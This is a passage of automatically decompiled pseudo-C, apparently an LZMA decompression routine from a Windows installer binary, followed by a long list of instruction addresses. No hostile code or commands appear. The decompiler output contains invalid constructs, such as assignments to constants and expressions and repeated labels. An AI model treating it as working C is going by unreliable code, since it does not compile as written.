												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c27
                                                        0x00406c2d
                                                        0x00406c3f
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406bfb
                                                        0x00406c01
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00407013
                                                        0x00407017
                                                        0x004071c6
                                                        0x004071dc
                                                        0x004071e4
                                                        0x004071eb
                                                        0x004071ed
                                                        0x004071f4
                                                        0x004071f8
                                                        0x004071f8
                                                        0x00407023
                                                        0x0040702a
                                                        0x00407032
                                                        0x00407035
                                                        0x00407038
                                                        0x00407038
                                                        0x0040703e
                                                        0x0040703e
                                                        0x004067da
                                                        0x004067da
                                                        0x004067da
                                                        0x004067e3
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x00000000
                                                        0x004067f4
                                                        0x00000000
                                                        0x00000000
                                                        0x004067fd
                                                        0x00406800
                                                        0x00406803
                                                        0x00406807
                                                        0x00000000
                                                        0x00000000
                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406fc5
                                                        0x00406fc5
                                                        0x00406fcb
                                                        0x00406fd1
                                                        0x00406fd7
                                                        0x00406ff1
                                                        0x00406ff4
                                                        0x00406ffa
                                                        0x00407005
                                                        0x00407007
                                                        0x00406fd9
                                                        0x00406fd9
